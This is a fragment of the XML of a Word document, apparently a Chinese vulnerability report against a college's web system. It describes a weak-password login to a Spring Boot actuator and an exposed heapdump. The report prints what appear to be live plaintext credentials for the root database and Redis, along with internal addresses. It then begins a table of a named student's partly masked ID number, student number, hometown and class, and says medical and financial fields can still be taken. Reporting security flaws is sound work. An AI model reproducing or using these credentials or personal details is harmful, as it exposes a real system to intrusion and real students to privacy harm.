          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>http://web.hzdyjsxy.cn:18080</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="8" w:name="u687cda92"/>
    <w:bookmarkStart w:id="9" w:name="u3215e03c"/>
    <w:bookmarkEnd w:id="7"/>
    <w:p w14:paraId="49B5081F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="640"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distL="0" distT="0" distB="0" distR="0">
            <wp:extent cx="5842000" cy="3487420"/>
            <wp:effectExtent l="0" t="0" r="0" b="17780"/>
            <wp:docPr id="1027"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3" cstate="print"/>
                    <a:srcRect l="0" t="0" r="0" b="0"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="0">
                      <a:off x="0" y="0"/>
                      <a:ext cx="5842000" cy="3487420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:bookmarkStart w:id="10" w:name="Y946n"/>
    <w:bookmarkEnd w:id="9"/>
    <w:p w14:paraId="410562D5">
      <w:pPr>
        <w:pStyle w:val="style1"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="640"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>成果1 弱口令登录actuator后台</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="11" w:name="u9f24de23"/>
    <w:bookmarkEnd w:id="10"/>
    <w:p w14:paraId="06AD54F5">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ruoyi/123456，登录后可下载</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="12" w:name="ua1e80cfd"/>
    <w:bookmarkEnd w:id="11"/>
    <w:p w14:paraId="42A0EABC">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>http://web.hzdyjsxy.cn:18080/prod-api/actuator</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="13" w:name="ube0b2964"/>
    <w:bookmarkStart w:id="14" w:name="u40a8c69a"/>
    <w:bookmarkEnd w:id="12"/>
    <w:p w14:paraId="3259FCD3">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="640"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distL="0" distT="0" distB="0" distR="0">
            <wp:extent cx="5334000" cy="4603115"/>
            <wp:effectExtent l="0" t="0" r="0" b="19685"/>
            <wp:docPr id="1028" name="图片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5"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4" cstate="print"/>
                    <a:srcRect l="0" t="0" r="0" b="0"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="0">
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="4603115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:bookmarkStart w:id="15" w:name="NxvqT"/>
    <w:bookmarkEnd w:id="14"/>
    <w:p w14:paraId="4144EBEA">
      <w:pPr>
        <w:pStyle w:val="style1"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="640"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>成果2 heapdump泄漏+敏感信息</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="16" w:name="u6d39057d"/>
    <w:bookmarkEnd w:id="15"/>
    <w:p w14:paraId="0C1B51DE">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>http://web.hzdyjsxy.cn:18080/prod-api/actuator/heapdump</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="17" w:name="u912526ee"/>
    <w:bookmarkEnd w:id="16"/>
    <w:p w14:paraId="0F206DAB">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>存在heapdump泄漏</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="18" w:name="uaca94c11"/>
    <w:bookmarkStart w:id="19" w:name="ua9ed0ca0"/>
    <w:bookmarkEnd w:id="17"/>
    <w:p w14:paraId="6A1BFF8D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="640"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distL="0" distT="0" distB="0" distR="0">
            <wp:extent cx="5841365" cy="2237105"/>
            <wp:effectExtent l="0" t="0" r="635" b="23495"/>
            <wp:docPr id="1029" name="图片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图片 6"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5" cstate="print"/>
                    <a:srcRect l="0" t="0" r="0" b="0"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="0">
                      <a:off x="0" y="0"/>
                      <a:ext cx="5841365" cy="2237105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:bookmarkStart w:id="20" w:name="JXPM2"/>
    <w:bookmarkEnd w:id="19"/>
    <w:p w14:paraId="4F27BA89">
      <w:pPr>
        <w:pStyle w:val="style4115"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="000000"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="000000"/>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="000000"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="000000"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="f2f2f2"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>com.baomidou.dynamic.datasource.creator.DataSourceProperty:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>[password = Hzdyjs@Root@123456, publicKey = MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJ4o6sn4WoPmbs7DR9mGQzuuUQM9erQTVPpwxIzB0ETYkyKffO097qXVRLA6KPmaV+/siWewR7vpfYYjWajw5KkCAwEAAQ==, url = jdbc:mysql://172.16.0.67:3306/hzdyjs_xg?useUnicode=true&amp;characterEncoding=utf8&amp;zeroDateTimeBehavior=convertToNull&amp;useSSL=true&amp;serverTimezone=GMT%2B8&amp;autoReconnect=true&amp;rewriteBatchedStatements=true&amp;allowPublicKeyRetrieval=true&amp;nullCatalogMeansCurrent=true, username = root]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>org.redisson.config.SingleServerConfig:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>[password = Hzdyjs@redis@123456, database = 3, address = redis://172.16.0.67:16379, tcpUserTimeout = 0]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>org.springframework.boot.autoconfigure.data.redis.RedisProperties:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>[password = Hzdyjs@redis@123456, database = 3, host = 172.16.0.67]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>de.codecentric.boot.admin.client.config.ClientProperties:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>[password = 123456, username = ruoyi]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>com.zaxxer.hikari.HikariDataSource:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[password = Hzdyjs@Root@123456, jdbcUrl = jdbc:mysql://172.16.0.67:3306/hzdyjs_xg?useUnicode=true&amp;characterEncoding=utf8&amp;zeroDateTimeBehavior=convertToNull&amp;useSSL=true&amp;serverTimezone=GMT%2B8&amp;autoReconnect=true&amp;rewriteBatchedStatements=true&amp;allowPublicKeyRetrieval=true&amp;nullCatalogMeansCurrent=true, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>username = root]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="21" w:name="uf0901b7e"/>
    <w:bookmarkEnd w:id="20"/>
    <w:p w14:paraId="422BEC57">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在堆栈里还能提取敏感信息</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="22" w:name="u095b5b19"/>
    <w:bookmarkEnd w:id="21"/>
    <w:p w14:paraId="2A16A5E4">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:color w:val="0f1115"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>共还原35 名在校学生（含 1 名关联班主任姓名），泄漏字段覆盖身份证号 + 姓名 + 学号 + 班级 + 学院，同一张表还有病史、过敏史、残疾等级、家庭经济状况等敏感字段待取。以下证明5条。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="23" w:name="u1dd37797"/>
    <w:bookmarkStart w:id="24" w:name="y3nS0"/>
    <w:bookmarkEnd w:id="22"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellSpacing w:w="0" w:type="dxa"/>
        <w:tblInd w:w="115"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690"/>
        <w:gridCol w:w="694"/>
        <w:gridCol w:w="2570"/>
        <w:gridCol w:w="1664"/>
        <w:gridCol w:w="693"/>
        <w:gridCol w:w="809"/>
        <w:gridCol w:w="693"/>
        <w:gridCol w:w="693"/>
      </w:tblGrid>
      <w:tr w14:paraId="0712904E">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41E6DEF7">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="25" w:name="uba4f7fc8"/>
          <w:bookmarkEnd w:id="23"/>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10479FA">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>姓名</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="26" w:name="u7f06ba5a"/>
          <w:bookmarkEnd w:id="25"/>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3C85A44">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>身份证号</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="27" w:name="u723fc3da"/>
          <w:bookmarkEnd w:id="26"/>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83BB281">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>学号</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="28" w:name="u2a1b70de"/>
          <w:bookmarkEnd w:id="27"/>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53BC380">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>户籍地</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="29" w:name="u92d1354b"/>
          <w:bookmarkEnd w:id="28"/>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0C7C7AA">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>班级</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="30" w:name="ue0ec3435"/>
          <w:bookmarkEnd w:id="29"/>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B438724">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>学院</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="31" w:name="u0e07d952"/>
          <w:bookmarkEnd w:id="30"/>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8A46DBB">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>班主任</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="31"/>
        </w:tc>
      </w:tr>
      <w:bookmarkStart w:id="32" w:name="u07478f9a"/>
      <w:tr w14:paraId="29F96739">
        <w:tblPrEx/>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E36ACFE">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="33" w:name="ucf6f45d7"/>
          <w:bookmarkEnd w:id="32"/>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42977001">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="422"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:b/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>洪可欣</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="34" w:name="ub30626c5"/>
          <w:bookmarkEnd w:id="33"/>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46B0A736">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="fafafa"/>
              </w:rPr>
              <w:t>330110</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New" w:hint="eastAsia"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="fafafa"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="fafafa"/>
              </w:rPr>
              <w:t>1625</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="35" w:name="ucffaa02f"/>
          <w:bookmarkEnd w:id="34"/>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20B9C16">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>2023</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>2011</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="36" w:name="ub140f0c5"/>
          <w:bookmarkEnd w:id="35"/>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26FA6D3">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>杭州市余杭区</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="37" w:name="ud3c48f12"/>
          <w:bookmarkEnd w:id="36"/>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05FB449">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>园林技术231</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="38" w:name="uebc68f1a"/>
          <w:bookmarkEnd w:id="37"/>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29437E0">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>生态园林学院</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="39" w:name="uf383880b"/>
          <w:bookmarkEnd w:id="38"/>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B3060AC">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>张羽</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="39"/>
        </w:tc>
      </w:tr>
      <w:bookmarkStart w:id="40" w:name="u2f09fe0d"/>
      <w:tr w14:paraId="230B7E28">
